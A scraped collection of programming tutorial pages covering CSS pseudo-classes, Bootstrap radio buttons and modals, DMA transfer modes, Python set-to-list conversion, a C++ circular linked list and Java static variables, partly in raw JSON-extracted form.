3\nNULL\nG\nE\nE\n" }, { "code": null, "e": 27393, "s": 27189, "text": "References:1. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read()2. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read(byte%5B%5D, int, int)" }, { "code": null, "e": 27408, "s": 27393, "text": "Java-Functions" }, { "code": null, "e": 27424, "s": 27408, "text": "Java-IO package" }, { "code": null, "e": 27429, "s": 27424, "text": "Java" }, { "code": null, "e": 27434, "s": 27429, "text": "Java" }, { "code": null, "e": 27532, "s": 27434, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27541, "s": 27532, "text": "Comments" }, { "code": null, "e": 27554, "s": 27541, "text": "Old Comments" }, { "code": null, "e": 27584, "s": 27554, "text": "Functional Interfaces in Java" }, { "code": null, "e": 27599, "s": 27584, "text": "Stream In Java" }, { "code": null, "e": 27620, "s": 27599, "text": "Constructors in Java" }, { "code": null, "e": 27666, "s": 27620, "text": "Different ways of Reading a text file in Java" }, { "code": null, "e": 27685, "s": 27666, "text": "Exceptions in Java" }, { "code": null, "e": 27702, "s": 27685, "text": "Generics in Java" }, { "code": null, "e": 27745, "s": 27702, "text": "Comparator Interface in Java with Examples" }, { "code": null, "e": 27761, "s": 27745, "text": "Strings in Java" }, { "code": null, "e": 27817, "s": 27761, "text": "Difference between Abstract Class and Interface in Java" } ]
CSS Pseudo-classes
A pseudo-class is used to define a special state of an element.

For example, it can be used to:

Style an element when a user mouses over it
Style visited and unvisited links differently
Style an element when it gets focus

The syntax of pseudo-classes:

Links can be displayed in different ways:

Note: a:hover MUST come after a:link and a:visited in the CSS definition in order to be effective! a:active MUST come after a:hover in the CSS definition in order to be effective! Pseudo-class names are not case-sensitive.

Pseudo-classes can be combined with HTML classes. When you hover over the link in the example, it will change color.

An example of using the :hover pseudo-class on a <div> element: hover over a <div> element to show a <p> element (like a tooltip).

The :first-child pseudo-class matches a specified element that is the first child of another element. In the following example, the selector matches any <p> element that is the first child of any element.

In the following example, the selector matches the first <i> element in all <p> elements.

In the following example, the selector matches all <i> elements in <p> elements that are the first child of another element.

The :lang pseudo-class allows you to define special rules for different languages. In the example below, :lang defines the quotation marks for <q> elements with lang="no".

Add different styles to hyperlinks: this example demonstrates how to add other styles to hyperlinks.

Use of :focus: this example demonstrates how to use the :focus pseudo-class.
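The code snippets that originally accompanied these examples did not survive extraction. As a rough, non-authoritative sketch only (the colors, class name and quote characters below are assumptions, not the original snippets), the link-state, :hover, :first-child and :lang rules described above could look like this:

/* General pseudo-class syntax: selector:pseudo-class { property: value; } */

/* Unvisited, visited, hovered and active links styled differently */
a:link    { color: red; }
a:visited { color: green; }
a:hover   { color: hotpink; }   /* must come after a:link and a:visited */
a:active  { color: blue; }      /* must come after a:hover */

/* A pseudo-class combined with an HTML class */
a.highlight:hover { color: #ff0000; }

/* Match any <p> that is the first child of its parent */
p:first-child { color: blue; }

/* Quotation marks for <q> elements with lang="no" */
q:lang(no) { quotes: "~" "~"; }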
[ { "code": null, "e": 65, "s": 0, "text": "A pseudo-class is used to define a special state \nof an element." }, { "code": null, "e": 97, "s": 65, "text": "For example, it can be used to:" }, { "code": null, "e": 141, "s": 97, "text": "Style an element when a user mouses over it" }, { "code": null, "e": 187, "s": 141, "text": "Style visited and unvisited links differently" }, { "code": null, "e": 223, "s": 187, "text": "Style an element when it gets focus" }, { "code": null, "e": 237, "s": 223, "text": "Mouse Over Me" }, { "code": null, "e": 267, "s": 237, "text": "The syntax of pseudo-classes:" }, { "code": null, "e": 309, "s": 267, "text": "Links can be displayed in different ways:" }, { "code": null, "e": 534, "s": 309, "text": "Note: a:hover MUST come after a:link and \na:visited in the CSS definition in order to be effective! a:active MUST come after \na:hover in the CSS definition in order to be effective!\nPseudo-class names are not case-sensitive." }, { "code": null, "e": 584, "s": 534, "text": "Pseudo-classes can be combined with HTML classes:" }, { "code": null, "e": 651, "s": 584, "text": "When you hover over the link in the example, it will change color:" }, { "code": null, "e": 715, "s": 651, "text": "An example of using the :hover pseudo-class on a <div> element:" }, { "code": null, "e": 782, "s": 715, "text": "Hover over a <div> element to show a <p> element (like a tooltip):" }, { "code": null, "e": 799, "s": 782, "text": "Tada! Here I am!" }, { "code": null, "e": 901, "s": 799, "text": "The :first-child pseudo-class matches a specified element that is the first child of another element." }, { "code": null, "e": 1004, "s": 901, "text": "In the following example, the selector matches any <p> element that is the first child of any element:" }, { "code": null, "e": 1094, "s": 1004, "text": "In the following example, the selector matches the first <i> element in all <p> elements:" }, { "code": null, "e": 1219, "s": 1094, "text": "In the following example, the selector matches all <i> elements in <p> elements that are the first child of another element:" }, { "code": null, "e": 1302, "s": 1219, "text": "The :lang pseudo-class allows you to define special rules for different languages." }, { "code": null, "e": 1391, "s": 1302, "text": "In the example below, :lang defines the quotation marks for <q> elements with lang=\"no\":" }, { "code": null, "e": 1491, "s": 1391, "text": "Add different styles to hyperlinks\nThis example demonstrates how to add other styles to hyperlinks." }, { "code": null, "e": 1567, "s": 1491, "text": "Use of :focus\nThis example demonstrates how to use the :focus pseudo-class." }, { "code": null, "e": 1628, "s": 1567, "text": "Set the background-color to red, when you mouse over a link." }, { "code": null, "e": 1801, "s": 1628, "text": "<style>\n {\n background-color: red;\n}\n</style>\n\n<body>\n\n<h1>This is a header.</h1>\n<p>This is a paragraph.</p>\n<a href=\"https://w3schools.com\">This is a link.</a>\n\n</body>\n" }, { "code": null, "e": 1820, "s": 1801, "text": "Start the Exercise" }, { "code": null, "e": 1853, "s": 1820, "text": "We just launchedW3Schools videos" }, { "code": null, "e": 1895, "s": 1853, "text": "Get certifiedby completinga course today!" }, { "code": null, "e": 2002, "s": 1895, "text": "If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail:" }, { "code": null, "e": 2021, "s": 2002, "text": "[email protected]" } ]
Bootstrap radio class
Use the .radio class if you want to limit the user to just one selection. Use the .radio-inline class on a series of radios so that the controls appear on the same line.

You can try to run the following code to implement the Bootstrap radio class −

<!DOCTYPE html>
<html>
   <head>
      <title>Bootstrap Forms</title>
      <meta name = "viewport" content = "width=device-width, initial-scale = 1">
      <link rel = "stylesheet" href = "https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css">
      <script src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
      <script src = "https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
   </head>
   <body>
      <label for = "name">Favourite Sports</label>
      <div class = "radio">
         <label>
            <input type = "radio" name = "optionsRadios" id = "optionsRadios1" value = "option1" checked> Cricket
         </label>
      </div>
      <div class = "radio">
         <label>
            <input type = "radio" name = "optionsRadios" id = "optionsRadios2" value = "option2"> Football
         </label>
      </div>
   </body>
</html>
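The example above only demonstrates stacked radios with the .radio class. As a minimal illustrative sketch (the name, id and value attributes here are assumptions, and it relies on the Bootstrap 3 style .radio-inline class that the text describes rather than the Bootstrap 4 form-check classes), the .radio-inline class mentioned earlier could be applied like this to place the controls on the same line:

<label class = "radio-inline">
   <input type = "radio" name = "sportsInline" id = "inlineRadio1" value = "option1" checked> Cricket
</label>
<label class = "radio-inline">
   <input type = "radio" name = "sportsInline" id = "inlineRadio2" value = "option2"> Football
</label>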
[ { "code": null, "e": 1216, "s": 1062, "text": "Use radio class if you want to limit the user to just one selection. Use .radio-inline class to a series of radios for controls appears on the same line." }, { "code": null, "e": 1302, "s": 1216, "text": "You can try to run the following code to implement the Bootstrap radio class &mminus;" }, { "code": null, "e": 1312, "s": 1302, "text": "Live Demo" }, { "code": null, "e": 2262, "s": 1312, "text": "<!DOCTYPE html>\n<html>\n <head>\n <title>Bootstrap Forms</title>\n <meta name = \"viewport\" content = \"width=device-width, initial-scale = 1\">\n <link rel = \"stylesheet\" href=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css\">\n <script src = \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n <script src = \"https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js\"></script>\n </head>\n <body>\n <label for = \"name\"></label>Favourite Sports</label>\n <div class = \"radio\">\n <label>\n <input type = \"radio\" name = \"optionsRadios\" id = \"optionsRadios1\" value = \"option1\" checked> Cricket\n </label>\n </div>\n <div class = \"radio\">\n <label>\n <input type = \"radio\" name = \"optionsRadios\" id = \"optionsRadios2\" value = \"option2\">\n Football\n </label>\n </div>\n </body>\n</html>" } ]
Explain the various DMA transfer modes in computer architecture?
DMA stands for Direct Memory Access. It is a hardware-controlled data transfer method in which an external device controls the data transfer. The external device creates the address and control signals that are needed to control the transfer and enables peripheral devices to access memory directly. The external device which controls the data transfer is known as the DMA controller.

There are three different modes of DMA data transfer, which are as follows −

Burst Mode − In burst mode, a whole block of data is transferred in one contiguous sequence. Once the DMA controller is granted access to the system buses by the CPU, it transfers all bytes of data in the data block before yielding control of the system buses back to the CPU. This mode is useful for loading programs or data files into memory, but it leaves the CPU inactive for relatively long periods.

Cycle Stealing Mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. However, it transfers one byte of data and then deasserts BR, returning control of the system buses to the CPU. It repeatedly issues requests via BR, transferring one byte of data per request, until it has transferred its whole block of data.

By repeatedly obtaining and releasing control of the system buses, the DMA controller essentially interleaves instruction and data transfers. The CPU processes an instruction, then the DMA controller transfers a data value, then the CPU processes another instruction, then the DMA controller transfers another data value, and so on.

Transparent Mode − Transparent mode requires the most time to transfer a block of data, yet it is also the most efficient mode in terms of overall system performance. In transparent mode, the DMA controller only transfers data when the CPU is performing operations that do not use the system buses. For example, a relatively simple CPU has several states that change or process data only within the CPU −

NOP1:(No Operation)
LDAC5:AC←DR
JUMP3:PC←DR,TR
CLAC1:AC←0,Z←1

The benefit of transparent mode is that the CPU never stops executing its programs and the DMA transfer is free in terms of time. The drawback is that the hardware needed to determine when the CPU is not using the system buses can be quite complex and relatively costly.
In addition, more advanced CPUs overlap their internal operations and use the system buses during virtually every cycle, which leaves the DMA controller very few opportunities to transfer data transparently.
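The three modes differ mainly in how ownership of the system buses alternates between the CPU and the DMA controller. The following C program is a purely conceptual sketch, not real DMA-controller code: the request_bus(), release_bus(), transfer_one_byte() and cpu_executes_instruction() helpers are invented stand-ins for the BR/BG handshake, the bus transfer and CPU work, used only to contrast burst mode with cycle-stealing mode.

#include <stdio.h>

#define BLOCK_SIZE 4

/* Invented stand-ins for the BR/BG handshake and the actual bus activity. */
static void request_bus(void) { printf("  DMA asserts BR, CPU grants BG\n"); }
static void release_bus(void) { printf("  DMA deasserts BR, CPU regains the buses\n"); }
static void transfer_one_byte(int i) { printf("  DMA transfers byte %d\n", i); }
static void cpu_executes_instruction(void) { printf("  CPU executes an instruction\n"); }

/* Burst mode: one bus grant, the whole block moves, the CPU waits. */
static void burst_mode(void) {
    printf("Burst mode:\n");
    request_bus();
    for (int i = 0; i < BLOCK_SIZE; i++)
        transfer_one_byte(i);
    release_bus();
}

/* Cycle stealing: one byte per bus grant, interleaved with CPU work. */
static void cycle_stealing_mode(void) {
    printf("Cycle stealing mode:\n");
    for (int i = 0; i < BLOCK_SIZE; i++) {
        request_bus();
        transfer_one_byte(i);
        release_bus();
        cpu_executes_instruction();
    }
}

int main(void) {
    burst_mode();
    cycle_stealing_mode();
    return 0;
}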
[ { "code": null, "e": 1453, "s": 1062, "text": "DMA represents Direct Memory Access. It is a hardware-controlled data transfer method. An external device can control data transfer. The external device creates address and control signals that are needed to control data transfer. External devices also enable peripheral devices to directly access memory. The external device which controls the data transfer is known as the DMA controller." }, { "code": null, "e": 1529, "s": 1453, "text": "There are three different modes of DMA data transfer which are as follows −" }, { "code": null, "e": 1939, "s": 1529, "text": "Burst Mode − In burst mode, a whole block of data is shared in one contiguous sequence. Since the DMA controller is allowed access to the system buses by the CPU, it sends all bytes of data in the data block earlier yield control of the system buses back to the CPU. This mode is beneficial for loading programs or data records into memory, but it does provide the CPU inactive for associatively long periods." }, { "code": null, "e": 2349, "s": 1939, "text": "Burst Mode − In burst mode, a whole block of data is shared in one contiguous sequence. Since the DMA controller is allowed access to the system buses by the CPU, it sends all bytes of data in the data block earlier yield control of the system buses back to the CPU. This mode is beneficial for loading programs or data records into memory, but it does provide the CPU inactive for associatively long periods." }, { "code": null, "e": 2734, "s": 2349, "text": "Cycle Stealing mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. It can share one byte of information and then deasserts BR, returning control of the system buses to the CPU. It already issues requests via BR, sharing one byte of information per request, just before it has shared its whole block of data." }, { "code": null, "e": 3119, "s": 2734, "text": "Cycle Stealing mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. It can share one byte of information and then deasserts BR, returning control of the system buses to the CPU. It already issues requests via BR, sharing one byte of information per request, just before it has shared its whole block of data." }, { "code": null, "e": 3436, "s": 3119, "text": "By frequently obtaining and free control of the system buses, the DMA controller substantially interleaves instructions and data transfers. The CPU processes an instruction, then the DMA controller sends a data value, thus the CPU processes another instruction, then the DMA controller sends another data value, etc." }, { "code": null, "e": 3822, "s": 3436, "text": "Transparent Mode − Transparent mode needed the most time to share a block of data, yet it is also important in terms of whole system performance. In transparent mode, the DMA controller only shares data when the CPU is implementing operations that do not use the system buses. For example, the relatively simple CPU has multiple states that change or process data only within the CPU −" }, { "code": null, "e": 4208, "s": 3822, "text": "Transparent Mode − Transparent mode needed the most time to share a block of data, yet it is also important in terms of whole system performance. In transparent mode, the DMA controller only shares data when the CPU is implementing operations that do not use the system buses. 
For example, the relatively simple CPU has multiple states that change or process data only within the CPU −" }, { "code": null, "e": 4270, "s": 4208, "text": "NOP1:(No Operation)\nLDAC5:AC←DR\nJUMP3:PC←DR,TR\nCLAC1:AC←0,Z←1" }, { "code": null, "e": 4635, "s": 4270, "text": "The benefit of transparent mode is that the CPU never stops implementing its programs. The DMA transfer is complementary in terms of time. The hardware requires to decide when the CPU is not utilizing the buses can be fully complex and relatively costly. In addition, more advanced CPUs overlap their internal services and use the system but virtually every cycle." } ]
Python | Convert set into a list - GeeksforGeeks
22 Jul, 2019

Given a set, write a Python program to convert the given set into a list.

Examples:

Input : {1, 2, 3, 4}
Output : [1, 2, 3, 4]

Input : {'Geeks', 'for', 'geeks'}
Output : ['Geeks', 'for', 'geeks']

Approach #1 : Using list(set_name).

Typecasting to a list can be done by simply using list(set_name).

# Python3 program to convert a
# set into a list
my_set = {'Geeks', 'for', 'geeks'}

s = list(my_set)
print(s)

['Geeks', 'for', 'geeks']

# Python3 program to convert a
# set into a list
def convert(set):
    return list(set)

# Driver function
s = set({1, 2, 3})
print(convert(s))

[1, 2, 3]

Approach #2 : Using the sorted() method

Using the sorted() function will convert the set into a list in sorted order. The only drawback of this method is that the elements of the set need to be sortable.

# Python3 program to convert a
# set into a list
def convert(set):
    return sorted(set)

# Driver function
my_set = {1, 2, 3}

s = set(my_set)
print(convert(s))

[1, 2, 3]

Approach #3 : Using [*set, ]

This essentially unpacks the set s inside a list literal which is created due to the presence of the single comma (, ). This approach is a bit faster but suffers from readability.

# Python3 program to convert a
# set into a list
def convert(set):
    return [*set, ]

# Driver function
s = set({1, 2, 3})
print(convert(s))

[1, 2, 3]
[ { "code": null, "e": 23771, "s": 23743, "text": "\n22 Jul, 2019" }, { "code": null, "e": 23843, "s": 23771, "text": "Given a set, write a Python program to convert the given set into list." }, { "code": null, "e": 23853, "s": 23843, "text": "Examples:" }, { "code": null, "e": 23967, "s": 23853, "text": "Input : {1, 2, 3, 4}\nOutput : [1, 2, 3, 4]\n\nInput : {'Geeks', 'for', 'geeks'}\nOutput : ['Geeks', 'for', 'geeks']\n" }, { "code": null, "e": 24004, "s": 23967, "text": " Approach #1 : Using list(set_name)." }, { "code": null, "e": 24068, "s": 24004, "text": "Typecasting to list can be done by simply using list(set_name)." }, { "code": "# Python3 program to convert a # set into a listmy_set = {'Geeks', 'for', 'geeks'} s = list(my_set)print(s)", "e": 24177, "s": 24068, "text": null }, { "code": null, "e": 24204, "s": 24177, "text": "['Geeks', 'for', 'geeks']\n" }, { "code": "# Python3 program to convert a # set into a listdef convert(set): return list(set) # Driver functions = set({1, 2, 3})print(convert(s))", "e": 24346, "s": 24206, "text": null }, { "code": null, "e": 24357, "s": 24346, "text": "[1, 2, 3]\n" }, { "code": null, "e": 24394, "s": 24357, "text": " Approach #2 : using sorted() method" }, { "code": null, "e": 24555, "s": 24394, "text": "Using sorted() function will convert the set into list in a defined order. The only drawback of this method is that the elements of the set need to be sortable." }, { "code": "# Python3 program to convert a # set into a listdef convert(set): return sorted(set) # Driver functionmy_set = {1, 2, 3} s = set(my_set)print(convert(s))", "e": 24714, "s": 24555, "text": null }, { "code": null, "e": 24725, "s": 24714, "text": "[1, 2, 3]\n" }, { "code": null, "e": 24934, "s": 24725, "text": " Approach #3 : Using [*set, ]This essentially unpacks the set s inside a list literal which is created due to the presence of the single comma (, ). This approach is a bit faster but suffers from readability." }, { "code": "# Python3 program to convert a # set into a listdef convert(set): return [*set, ] # Driver functions = set({1, 2, 3})print(convert(s))", "e": 25073, "s": 24934, "text": null }, { "code": null, "e": 25084, "s": 25073, "text": "[1, 2, 3]\n" }, { "code": null, "e": 25098, "s": 25084, "text": "ManasChhabra2" }, { "code": null, "e": 25119, "s": 25098, "text": "Python list-programs" }, { "code": null, "e": 25139, "s": 25119, "text": "Python set-programs" }, { "code": null, "e": 25146, "s": 25139, "text": "Python" }, { "code": null, "e": 25162, "s": 25146, "text": "Python Programs" }, { "code": null, "e": 25260, "s": 25162, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 25269, "s": 25260, "text": "Comments" }, { "code": null, "e": 25282, "s": 25269, "text": "Old Comments" }, { "code": null, "e": 25317, "s": 25282, "text": "Read a file line by line in Python" }, { "code": null, "e": 25339, "s": 25317, "text": "Enumerate() in Python" }, { "code": null, "e": 25371, "s": 25339, "text": "How to Install PIP on Windows ?" 
}, { "code": null, "e": 25413, "s": 25371, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 25439, "s": 25413, "text": "Python String | replace()" }, { "code": null, "e": 25461, "s": 25439, "text": "Defaultdict in Python" }, { "code": null, "e": 25500, "s": 25461, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 25546, "s": 25500, "text": "Python | Split string into list of characters" }, { "code": null, "e": 25603, "s": 25546, "text": "Python program to check whether a number is Prime or not" } ]
C++ Program to Implement Circular Singly Linked List
Circular singly linked list is a type of data structure that is made up of nodes that are created using self referential structures. Each of these nodes contain two parts, namely the data and the reference to the next list node. Only the reference to the first list node is required to access the whole linked list. This is known as the head. The last node in the list points to head or first node of the list. That is the reason this is known as a circular linked list. A program to implement circular singly linked list is given as follows. Live Demo #include <iostream> using namespace std; struct Node { int data; struct Node *next; }; struct Node* head = NULL; void insert(int newdata) { struct Node *newnode = (struct Node *)malloc(sizeof(struct Node)); struct Node *ptr = head; newnode->data = newdata; newnode->next = head; if (head!= NULL) { while (ptr->next != head) ptr = ptr->next; ptr->next = newnode; } else newnode->next = newnode; head = newnode; } void display() { struct Node* ptr; ptr = head; do { cout<<ptr->data <<" "; ptr = ptr->next; } while(ptr != head); } int main() { insert(3); insert(1); insert(7); insert(2); insert(9); cout<<"The circular linked list is: "; display(); return 0; } The circular linked list is: 9 2 7 1 3 In the above program, the structure Node forms the linked list node. It contains the data and a pointer to the next linked list node. This is given as follows. struct Node { int data; struct Node *next; }; The function insert() inserts the data into the beginning of the linked list. It creates a newnode and inserts the number in the data field of the newnode. If the head is NULL, then newnode points to itself otherwise the last node in the circular linked list points to newnode. Then the head points to the start of the list i.e. to the newnode. This is given below. void insert(int newdata) { struct Node *newnode = (struct Node *)malloc(sizeof(struct Node)); struct Node *ptr = head; newnode->data = newdata; newnode->next = head; if (head!= NULL) { while (ptr->next != head) ptr = ptr->next; ptr->next = newnode; } else newnode->next = newnode; head = newnode; } The function display() displays the whole linked list. First ptr points to head. Then it is continuously forwarded to the next node until all the data values of the nodes are printed. This is given below. void display() { struct Node* ptr; ptr = head; do { cout<< ptr->data <<" "; ptr = ptr->next; } while(ptr != head); } In the function main(), first various values are inserted into the circular linked list by calling insert(). Then the linked list is displayed. This is given below. int main() { insert(3); insert(1); insert(7); insert(2); insert(9); cout<<"The circular linked list is: "; display(); return 0; }
[ { "code": null, "e": 1291, "s": 1062, "text": "Circular singly linked list is a type of data structure that is made up of nodes that are created using self referential structures. Each of these nodes contain two parts, namely the data and the reference to the next list node." }, { "code": null, "e": 1533, "s": 1291, "text": "Only the reference to the first list node is required to access the whole linked list. This is known as the head. The last node in the list points to head or first node of the list. That is the reason this is known as a circular linked list." }, { "code": null, "e": 1605, "s": 1533, "text": "A program to implement circular singly linked list is given as follows." }, { "code": null, "e": 1616, "s": 1605, "text": " Live Demo" }, { "code": null, "e": 2370, "s": 1616, "text": "#include <iostream>\nusing namespace std;\nstruct Node {\n int data;\n struct Node *next;\n};\nstruct Node* head = NULL;\nvoid insert(int newdata) {\n struct Node *newnode = (struct Node *)malloc(sizeof(struct Node));\n struct Node *ptr = head;\n newnode->data = newdata;\n newnode->next = head;\n if (head!= NULL) {\n while (ptr->next != head)\n ptr = ptr->next;\n ptr->next = newnode;\n } else\n newnode->next = newnode;\n head = newnode;\n}\nvoid display() {\n struct Node* ptr;\n ptr = head;\n do {\n cout<<ptr->data <<\" \";\n ptr = ptr->next;\n } while(ptr != head);\n}\nint main() {\n insert(3);\n insert(1);\n insert(7);\n insert(2);\n insert(9);\n cout<<\"The circular linked list is: \";\n display();\n return 0;\n}" }, { "code": null, "e": 2409, "s": 2370, "text": "The circular linked list is: 9 2 7 1 3" }, { "code": null, "e": 2569, "s": 2409, "text": "In the above program, the structure Node forms the linked list node. It contains the data and a pointer to the next linked list node. This is given as follows." }, { "code": null, "e": 2621, "s": 2569, "text": "struct Node {\n int data;\n struct Node *next;\n};" }, { "code": null, "e": 2987, "s": 2621, "text": "The function insert() inserts the data into the beginning of the linked list. It creates a newnode and inserts the number in the data field of the newnode. If the head is NULL, then newnode points to itself otherwise the last node in the circular linked list points to newnode. Then the head points to the start of the list i.e. to the newnode. This is given below." }, { "code": null, "e": 3328, "s": 2987, "text": "void insert(int newdata) {\n struct Node *newnode = (struct Node *)malloc(sizeof(struct Node));\n struct Node *ptr = head;\n newnode->data = newdata;\n newnode->next = head;\n if (head!= NULL) {\n while (ptr->next != head)\n ptr = ptr->next;\n ptr->next = newnode;\n } else\n newnode->next = newnode;\n head = newnode;\n}" }, { "code": null, "e": 3533, "s": 3328, "text": "The function display() displays the whole linked list. First ptr points to head. Then it is continuously forwarded to the next node until all the data values of the nodes are printed. This is given below." }, { "code": null, "e": 3674, "s": 3533, "text": "void display() {\n struct Node* ptr;\n ptr = head;\n do {\n cout<< ptr->data <<\" \";\n ptr = ptr->next;\n } while(ptr != head);\n}" }, { "code": null, "e": 3839, "s": 3674, "text": "In the function main(), first various values are inserted into the circular linked list by calling insert(). Then the linked list is displayed. This is given below." 
}, { "code": null, "e": 3993, "s": 3839, "text": "int main() {\n insert(3);\n insert(1);\n insert(7);\n insert(2);\n insert(9);\n cout<<\"The circular linked list is: \";\n display();\n return 0;\n}" } ]
Static variables in Java
Class variables, also known as static variables, are declared with the static keyword in a class, but outside a method, constructor, or block.

There is only one copy of each class variable per class, regardless of how many objects are created from it.

Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value.

Static variables are stored in static memory. It is rare to use static variables other than those declared final and used as either public or private constants.

Static variables are created when the program starts and destroyed when the program stops.

Visibility is similar to that of instance variables. However, most static variables are declared public since they must be available for users of the class.

Default values are the same as for instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks.

Static variables can be accessed through the class name, as ClassName.VariableName.

When declaring class variables as public static final, variable names (constants) are all in upper case. If the static variables are not public and final, the naming syntax is the same as for instance and local variables.

Online Demo

import java.io.*;
public class Employee {

   // salary variable is a private static variable
   private static double salary;

   // DEPARTMENT is a constant
   public static final String DEPARTMENT = "Development ";

   public static void main(String args[]) {
      salary = 1000;
      System.out.println(DEPARTMENT + "average salary:" + salary);
   }
}

This will produce the following result −

Development average salary:1000.0

Note − If the variables are accessed from outside the class, the constant should be accessed as Employee.DEPARTMENT
[ { "code": null, "e": 1204, "s": 1062, "text": "Class variables also known as static variables are declared with the static keyword in a class, but outside a method, constructor or a block." }, { "code": null, "e": 1346, "s": 1204, "text": "Class variables also known as static variables are declared with the static keyword in a class, but outside a method, constructor or a block." }, { "code": null, "e": 1461, "s": 1346, "text": "There would only be one copy of each class variable per class, regardless of how many objects are created from it." }, { "code": null, "e": 1576, "s": 1461, "text": "There would only be one copy of each class variable per class, regardless of how many objects are created from it." }, { "code": null, "e": 1787, "s": 1576, "text": "Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value." }, { "code": null, "e": 1998, "s": 1787, "text": "Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value." }, { "code": null, "e": 2157, "s": 1998, "text": "Static variables are stored in the static memory. It is rare to use static variables other than declared final and used as either public or private constants." }, { "code": null, "e": 2316, "s": 2157, "text": "Static variables are stored in the static memory. It is rare to use static variables other than declared final and used as either public or private constants." }, { "code": null, "e": 2407, "s": 2316, "text": "Static variables are created when the program starts and destroyed when the program stops." }, { "code": null, "e": 2498, "s": 2407, "text": "Static variables are created when the program starts and destroyed when the program stops." }, { "code": null, "e": 2647, "s": 2498, "text": "Visibility is similar to instance variables. However, most static variables are declared public since they must be available for users of the class." }, { "code": null, "e": 2796, "s": 2647, "text": "Visibility is similar to instance variables. However, most static variables are declared public since they must be available for users of the class." }, { "code": null, "e": 3094, "s": 2796, "text": "Default values are same as instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks." }, { "code": null, "e": 3392, "s": 3094, "text": "Default values are same as instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks." }, { "code": null, "e": 3480, "s": 3392, "text": "Static variables can be accessed by calling with the class name ClassName.VariableName." }, { "code": null, "e": 3568, "s": 3480, "text": "Static variables can be accessed by calling with the class name ClassName.VariableName." }, { "code": null, "e": 3791, "s": 3568, "text": "When declaring class variables as public static final, then variable names (constants) are all in upper case. 
If the static variables are not public and final, the naming syntax is the same as instance and local variables." }, { "code": null, "e": 4014, "s": 3791, "text": "When declaring class variables as public static final, then variable names (constants) are all in upper case. If the static variables are not public and final, the naming syntax is the same as instance and local variables." }, { "code": null, "e": 4026, "s": 4014, "text": "Online Demo" }, { "code": null, "e": 4385, "s": 4026, "text": "import java.io.*;\npublic class Employee {\n\n // salary variable is a private static variable\n private static double salary;\n\n // DEPARTMENT is a constant\n public static final String DEPARTMENT = \"Development \";\n\n public static void main(String args[]) {\n salary = 1000;\n System.out.println(DEPARTMENT + \"average salary:\" + salary);\n }\n}" }, { "code": null, "e": 4426, "s": 4385, "text": "This will produce the following result −" }, { "code": null, "e": 4458, "s": 4426, "text": "Development average salary:1000" }, { "code": null, "e": 4573, "s": 4458, "text": "Note − If the variables are accessed from an outside class, the constant should be accessed as Employee.DEPARTMENT" } ]
Set large modal in Bootstrap
Use the .modal-lg class in Bootstrap to set a large modal with more width. You can try to run the following code to set a large modal:

Live Demo

<!DOCTYPE html>
<html>
   <head>
      <title>Bootstrap Example</title>
      <link rel = "stylesheet" href = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
      <script src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
      <script src = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
   </head>
   <body>
      <div class = "container">
         <h2>Examination</h2>
         <button type = "button" class = "btn btn-lg" data-toggle = "modal" data-target="#new">Result</button>
         <div class = "modal fade" id = "new" role = "dialog">
            <div class = "modal-dialog modal-lg">
               <div class = "modal-content">
                  <div class = "modal-header">
                     <button type = "button" class="close" data-dismiss = "modal">×</button>
                     <h4 class = "modal-title">Warning</h4>
                  </div>
                  <div class = "modal-body">
                     <p>If JavaScript isn't enabled in your web browser, then you may not be able to see the result.</p>
                  </div>
                  <div class = "modal-footer">
                     <button type = "button" class = "btn btn-primary" data-dismiss = "modal">Close</button>
                  </div>
               </div>
            </div>
         </div>
      </div>
   </body>
</html>
